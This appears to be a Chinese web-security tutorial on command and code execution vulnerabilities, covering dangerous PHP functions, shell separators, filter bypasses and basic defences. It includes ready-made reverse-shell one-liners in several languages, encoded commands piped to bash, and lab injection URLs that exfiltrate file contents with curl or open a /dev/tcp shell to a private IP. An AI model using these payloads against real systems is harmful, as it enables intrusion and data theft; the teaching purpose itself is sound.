WEB常见漏洞之命令执行(基础原理篇)

简介: WEB常见漏洞之命令执行(基础原理篇)

0x01 漏洞概述

命令执行漏洞就是服务器端没有对客户端用户输入的命令进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。为什么客户端能直接对服务器执行命令呢,因为在服务器安装的web程序,web框架和web组件等外部程序有时候需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,就会使得用户通过外部程序直接编写和执行系统的命令函数

如PHP中的system()、exec()、shell_exec()、passthru()、popen()、proc_popen()等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击

漏洞利用条件

  1. 用户能够控制的函数输入
  2. 存在可以执行代码或者系统命令的危险函数

漏洞产生原因

1.没有对用户输入进行过滤或过滤不严 例如,没有过滤 &、&&、| 、||等连接符

2.系统漏洞造成的命令执行 bash 破壳漏洞(CVE-2014-6271),该漏洞可以构造环境变量的值来执行具有攻击力的脚本代码,会影响到 bash 交互的多种应用,如 http、ssh 和 dhcp 等

3.调用的第三方组件存在代码执行漏洞 例如:php(system()、shell_exec()、exec()、eval() JAVA 中的命令执行漏洞(struts2/ElasticsearchGroovy等) ThinkPHP命令执行

0x02 常见危险函数

PHP:exec、shell_exec、system、passthru、popen、proc_open等
ASP.NET:System.Diagnostics.Start.Process、System.Diagnostics.Start.ProcessStartInfo等
Java:java.lang.runtime.Runtime.getRuntime、java.lang.runtime.Runtime.exec

(1)system

该函数会把执行结果输出

并把输出结果的最后一行作为字符串返回

如果执行失败则返回false

这个也最为常用

<?php
highlight_file(__FILE__);
system('pwd');
system('whoami');
?>

(2)exec

不输出结果

返回执行结果的最后一行

可以使用output进行输出

<?php
highlight_file(__FILE__);
exec('pwd',$b);
var_dump($b);
?>

(3)passthru

此函数只调用命令

并把运行结果原样地直接输出

没有返回值。

<?php
highlight_file(__FILE__);
passthru('ls');
?>

(4)shell_exec

不输出结果,返回执行结果

使用反引号(``)时调用的就是此函数

<?php
highlight_file(__FILE__);
var_dump(shell_exec('ls'));
?>

(5)ob_start

此函数将打开输出缓冲

当输出缓冲激活后,脚本将不会输出内容(除http标头外)

相反需要输出的内容被存储在内部缓冲区中。

内部缓冲区的内容可以用 ob_get_contents() 函数复制到一个字符串变量中
想要输出存储在内部缓冲区中的内容,可以使用 ob_end_flush() 函数
另外, 使用 ob_end_clean() 函数会静默丢弃掉缓冲区的内容

<?php
    ob_start("system");
    echo "whoami";
    ob_end_flush();
?>

命令连接符

Windows和Linux都支持的命令连接符:

cmd1 | cmd2 只执行cmd2
cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行
cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2
cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2

Linux还支持分号;


cmd1 ; cmd2 按顺序依次执行,先执行cmd1再执行cmd2

0x03 代码执行漏洞

由于服务器对危险函数过滤不严

导致用户输入的一些字符串可以被转换成代码来执行

从而造成代码执行漏洞

成因

1.用户能够控制函数输入

2.存在可执行代码的危险函数

常见代码执行函数

PHP: eval、assert、preg_replace()、+/e模式(PHP版本<5.5.0)
Javascript: eval
Vbscript:Execute、Eval
Python: exec

常用代码执行函数

(1)${}执行代码

中间的php代码将会被解析

<?php
${phpinfo()};
?>

(2)eval

将字符串当做函数进行执行

需要传入一个完整的语句

必须以分号 ; 结尾

最常用的函数

<?php
eval('echo "hello";');
?>

(3)assert

判断是否为字符串

是则当成代码执行

在php7.0.29之后的版本不支持动态调

低版本
<?php 
assert($_POST['a']);
?>
7.0.29之后
<?php
$a = 'assert';
$a(phpinfo());
?>

(4)preg_replace

用来执行一个正则表达式的搜索和替换

执行代码需要使用/e修饰符

前提是不超过php7


mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

$pattern: 正则表达式匹配的内容

$replacement: 用于替换的字符串或字符串数组。

$subject: 要搜索替换的目标字符串或字符串数组。

    <?php
    preg_replace("/pat/e", $_GET['reg'], 'my pat');
    ?>

    (5)create_function

    用来创建匿名函数


    create_function(string $args,string $code
      args是要创建的函数的参数
      code是函数内的代码

      一个demo

      <?php
      error_reporting(0);
      $sort_by = $_GET['sort_by'];
      $sorter = 'strnatcasecmp';
      $databases=array('1234','4321');
      $sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
      usort($databases, create_function('$a, $b', $sort_function));
      ?

      payload


      ?sort_by="]);}phpinfo();/*

      (6)array_map

      为数组的每个元素应用回调函数

      <?php
      highlight_file(__FILE__);
      $a = $_GET['a'];
      $b = $_GET['b'];
      $array[0] = $b;
      $c = array_map($a,$array);
      ?>

      payload


      ?a=assert&b=phpinfo();

      (7)call_user_func

      回调函数,可以使用is_callable查看是否可以进行调用


      mixed call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] )

      第一个参数 callback 是被调用的回调函数

      其余参数是回调函数的参数

      <?php
      highlight_file(__FILE__);
      $a = 'system';
      $b = 'pwd';
      call_user_func($a,$b);
      call_user_func('eval','phpinfo()');
      ?>

      (8)call_user_func_array

      回调函数,参数为数组


      mixed call_user_func_array ( callable $callback , array $param_arr )

      第一个参数作为回调函数(callback)调用

      把参数数组作(param_arr)为回调函数的的参数传入

        <?ph
        phighlight_file(__FILE__);
        $array[0] = $_POST['a'];
        call_user_func_array("assert",$array);
        ?>

        (9)array_filter


        array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )

        依次将 array 数组中的每个值传递到 callback 函数

        如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中

        数组的键名保留不变

          <?php
          highlight_file(__FILE__);
          $array[0] = $_GET['a'];
          array_filter($array,'assert');
          ?>

          (10)usort

          使用自定义函数对数组进行排序


          bool usort ( array &$array , callable $value_compare_func )

          本函数将用用户自定义的比较函数对一个数组中的值进行排序

          如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数

            <?php
            highlight_file(__FILE__);
            usort(...$_GET);      php5.6以上的写法
            #usort($_GET[1],'assert');  php5.6可用
            ?

            payload


            1[]=phpinfo()&1[]=123&2[]=assert

            命令执行与代码执行的区别

            代码执行:执行效果完全依赖于语言本身

            命令执行:执行效果不受语言本身、命令本身的限制

            0x04 常用命令拼接符号

            Windows支持的管道符

            常见分隔符

              换行符 %0a
              回车符 %0d连
              续指令 ;后
              台进程 &
              管道符 |
              逻辑 ||、&&

              1. "|":直接执行后面的语句

              格式:命令1|命令2…命令n

              规则:当命令1执行成功时才执行命令2,如果命令1未执行成功则不会执行命令2

              示例:

              命令1执行成功,执行命令2

              2. "||":如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假

              格式:命令1||命令2…命令n

              规则:或运算,如果命令1执行失败,执行命令2,如果命令1执行成功,则不执行命令2

              示例:

              命令1错误,命令2成功执行

              命令1成功,命令2不执行

              3. "&":如果前面的语句执行为错则直接执行后面的语句,此时后面语句无论真假整个语句都是假

              格式:命令1&命令2…命令n
              规则:命令1和命令2一起执行,互不影响
              示例:

              4."&&":如果前面的语句为假则直接出错,不执行后面的语句,前面语句只能为真

              格式:命令1&&命令2…命令n
              规则:命令1和命令2一起执行,如果命令1出错命令2则不执行
              示例:

              Linux系统支持的管道符

              1.";":执行完前面的语句再执行后面的

              格式:命令1;命令2…命令n
              规则:隔开多条shell命令一起执行
              示例:
              通过;执行多条命令

              2."|":显示后面语句的执行结果

              格式:命令1|命令2…命令n
              规则:隔开多条shell命令,只执行最后一个
              示例:
              通过|执行最后一条命令(命令执行时,Linux和Windows系统一样)

              3."||":当前面的语句执行出错时。执行后面的语句

              格式:命令1||命令2…命令n
              规则:隔开多条shell命令,只执行第一个
              示例:
              通过||执行第一条命令,如果第一个命令出错,则向后执行(命令执行时,Linux和Windows系统一样)

              4."&":如果前面的语句为假,则直接执行后面的语句,前面的语句可真可假

              格式:命令1&命令2…命令n
              规则:隔开多条shell命令,只执行第一个
              示例:
              通过&任务放到后台执行。看下图,输出多了一串数字,这个数字就是进程 ID。在 Linux 系统中运行的每一个进程都有一个唯一的进程 ID,可以使用进程 ID 来暂停、恢复或者终止对应的进程(命令执行时,LinuxWindows系统一样)

              5."&&":如果前面的语句为假,则直接出错,不执行后面的语句,前面的语句只能为真(命令执行时,Linux和Windows系统一样)

              0x05 常见绕过姿势(Linux)

              空格绕过

              <  --  重定向,如cat<flag.php
              <>      --   重定向,如cat<>flag.php
              %09  --  需要php环境,如cat%09flag.php
              ${IFS}  --  单纯cat$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名,如cat${IFS2}flag.php
              $IFS$9  --  后面加个$与{}类似,起截断作用,$9是当前系统shell进程第九个参数持有者,始终为空字符串,如cat$IFS2$9flag.php

              使用转义符号

                ca\t /fl\ag
                cat fl''ag

                利用拼接绕过

                  a=c;b=at;c=flag;$a$b $c
                  a=c;b=at;c=heb;d=ic;ab{c}{d}

                  利用编码绕过

                  base64编码

                    echo MTIzCg==|base64 -d 其将会打印123
                    echo "Y2F0IC9mbGFn"|base64-d|bash ==>cat /flag

                    hex编码


                    echo "636174202f666c6167" | xxd -r -p|bash ==>cat /flag

                    单引号、双引号绕过

                      ca''t flag 或ca""t flag
                      ca''t te""st.php

                      反斜杠绕过

                        ca\t fl\ag
                        cat te\st.php

                        绕过IP句点

                        网络地址可以转换成数字地址,比如127.0.0.1可以转化为2130706433。
                        可以直接访问http://2130706433或者http://0x7F000001,这样就可以绕过.的ip过滤。
                        在线转换地址:数字转IP地址 IP地址转数字 域名转数字IP

                        在线工具:


                        http://www.msxindl.com/tools/ip/ip_num.asp --数字转IP

                        利用Linux换行执行

                        例如想要获取 flag.txt 中的内容,需要 cat flag.txt 命令

                        利用通配符获取内容

                        linux

                        ?可以匹配一个字符
                        *可以匹配很多字符

                        3. 绕过长度限制

                        利用 > 符号创建文件


                        >flag.txt

                        通过 > 将命令结果存入文件中


                        echo "hello hacker" > flag.txt

                        >> 符号的作用是将字符串添加到文件内容末尾,不会覆盖原内容


                        echo "hello hacker" >> flag.txt


                        
                                 

                        反向连接(Reverse Shell)的各类技术方法

                        - ; rm/tmp/f; mkfifo/tmp/f; cat /tmp/f|/bin/sh-i2>&1|nc 192.168.80.30 443 >/tmp/f
                        - ; perl-e 'use Socket;$i="192.168.80.30";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh-i");};'
                        - ; python-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.80.30",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
                        - ; php-r '$sock=fsockopen("192.168.80.30",443);exec("/bin/sh-i<&3 >&3 2>&3");’
                        - ; ruby-rsocket-e'f=TCPSocket.open("192.168.80.30",443).to_i;execsprintf("/bin/sh-i<&%d >&%d 2>&%d",f,f,f)'

                        一些场景应用

                        1、无任何过滤或简单过滤

                        ▪http://192.168.80.30/medium.php?name=%0acat flag.php
                        ▪http://192.168.80.30/medium.php?name=$(cat flag.php)

                        2、过滤了;,|,&,`

                        ▪http://192.168.80.30/high.php?name=$(cat<flag.php)
                        ▪http://192.168.80.30/high.php?name=$(cat$IFS./flag.php)

                        3、过滤了;,|,&,`,\s

                        ▪http://192.168.80.30/high.php?name=$(cat<flag.php)
                        ▪http://192.168.80.30/high.php?name=$(cat$IFS./flag.php)

                        4、过滤了关键词,比如cat

                        ▪http://192.168.80.30/low.php?name=;c''at flag.php
                        ▪http://192.168.80.30/low.php?name=;c\at flag.php
                        ▪http://192.168.80.30/low.php?name=;c$@at flag.php
                        ▪http://192.168.80.30/high.php?name=$(c\at<flag.php)
                        ▪http://192.168.80.30/high.php?name=$(tac<flag.php)
                        ▪http://192.168.80.30/high.php?name=$(more<flag.php)
                        ▪http://192.168.80.30/high.php?name=$(tail<flag.php)

                        5、页面无命令结果的回显

                        ▪http://192.168.80.30/noecho.php?name=;curl 192.168.9.111:1234?hh=`ls|base64`
                        ▪http://192.168.80.30/noecho.php?name=;curl 192.168.9.111:1234?hh=`cat flag.php|base64`
                        ▪http://192.168.80.30/noecho.php?name=%0acurl 192.168.9.111:1234?hh=`cat flag.php|base64`
                        ▪http://192.168.80.30/noecho.php?name=%3Bbash%20-c%20%22bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.9.111%2f1234%200%3E%261%22%20
                        ▪http://192.168.80.30/noecho.php?name=;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.9.111",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

                        0x06 常见linux命令

                        ls命令

                        ls -a 列出文件下所有的文件,包括以“.“开头的隐藏文件(linux下文件隐藏文件是以.开头的,如果存在..代表存在着父目录)。
                        ls -l 列出文件的详细信息,如创建者,创建时间,文件的读写权限列表等等。
                        ls -F 在每一个文件的末尾加上一个字符说明该文件的类型。"@"表示符号链接、"|"表示FIFOS、"/"表示目录、"="表示套接字。
                        ls -s 在每个文件的后面打印出文件的大小。size(大小)
                        ls -t 按时间进行文件的排序 Time(时间)
                        ls -A 列出除了"."和".."以外的文件。
                        ls -R 将目录下所有的子目录的文件都列出来,相当于我们编程中的“递归”实现
                        ls -L 列出文件的链接名。Link(链接)
                        ls -S 以文件的大小进行排序

                        读文件命令

                        cat--由第一行开始显示内容,并将所有内容输出
                        tac--从最后一行倒序显示内容,并将所有内容输出
                        more-- 根据窗口大小,一页一页的现实文件内容
                        less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
                        head-- 只显示头几行
                        tail --只显示最后几行
                        nl --类似于cat -n,显示时输出行号
                        tailf-- 类似于tail -f
                        vim --使用vim工具打开文本
                        vi --使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出

                        0x07 漏洞防御

                        1.尽量使用自定义函数或函数库实现外部应用程序命令的功能。在执行system、eval等命令执行功能的函数前,要确认参数内容。

                        2.参数的值尽量使用引号包括,插入前使用addslashes转义(addslashes、魔数引号、htmlspecialchars、htmlentities 、mysql_real_escape_string)

                        3.在进入执行命令函数前进行严格的检测和过滤以及对敏感字符进行转义

                          如:cat、tail、find、echo、tar等等
                          如:|、||、&、;、<、>、$等
                          目录
                          相关文章
                          |
                          3月前
                          |
                          缓存 移动开发 安全
                          Web安全-HTTP响应拆分(CRLF注入)漏洞
                          Web安全-HTTP响应拆分(CRLF注入)漏洞
                          214 1
                          |
                          11天前
                          |
                          SQL 存储 XML
                          常见Web漏洞分析与防范研究
                          在以上内容中,结合OWASP、Toptal和Brightsec等权威来源的信息,确保回答的专业性和准确性。通过图表和思维导图的方式,可以更系统地了解和记忆Web安全知识,帮助企业在实际应用中更好地防范各种安全威胁。
                          46 13
                          |
                          3月前
                          |
                          前端开发 Java API
                          JAVA Web 服务及底层框架原理
                          【10月更文挑战第1天】Java Web 服务是基于 Java 编程语言用于开发分布式网络应用程序的一种技术。它通常运行在 Web 服务器上,并通过 HTTP 协议与客户端进行通信。
                          56 1
                          |
                          4月前
                          |
                          缓存 移动开发 安全
                          Web安全-HTTP响应拆分(CRLF注入)漏洞
                          Web安全-HTTP响应拆分(CRLF注入)漏洞
                          251 8
                          |
                          4月前
                          |
                          安全 关系型数据库 Shell
                          Web安全-浅析CSV注入漏洞的原理及利用
                          Web安全-浅析CSV注入漏洞的原理及利用
                          196 3
                          |
                          4月前
                          |
                          安全 应用服务中间件 开发工具
                          Web安全-SVN信息泄露漏洞分析
                          Web安全-SVN信息泄露漏洞分析
                          253 2
                          |
                          3月前
                          |
                          存储 安全 前端开发
                          在前端开发中需要考虑的常见web安全问题和攻击原理以及防范措施
                          在前端开发中需要考虑的常见web安全问题和攻击原理以及防范措施
                          317 0
                          |
                          4月前
                          |
                          JSON 安全 JavaScript
                          Web安全-JQuery框架XSS漏洞浅析
                          Web安全-JQuery框架XSS漏洞浅析
                          673 2
                          |
                          3月前
                          |
                          XML JSON API
                          ServiceStack:不仅仅是一个高性能Web API和微服务框架,更是一站式解决方案——深入解析其多协议支持及简便开发流程,带您体验前所未有的.NET开发效率革命
                          【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架,支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程,提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑,安装简单,通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务,包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议,具备自动验证、自动过滤器等丰富功能,适合快速搭建高性能、可扩展的服务端应用。
                          213 3
                          |
                          1月前
                          |
                          前端开发 安全 JavaScript
                          2025年,Web3开发学习路线全指南
                          本文提供了一条针对Dapp应用开发的学习路线,涵盖了Web3领域的重要技术栈,如区块链基础、以太坊技术、Solidity编程、智能合约开发及安全、web3.js和ethers.js库的使用、Truffle框架等。文章首先分析了国内区块链企业的技术需求,随后详细介绍了每个技术点的学习资源和方法,旨在帮助初学者系统地掌握Dapp开发所需的知识和技能。
                          2025年,Web3开发学习路线全指南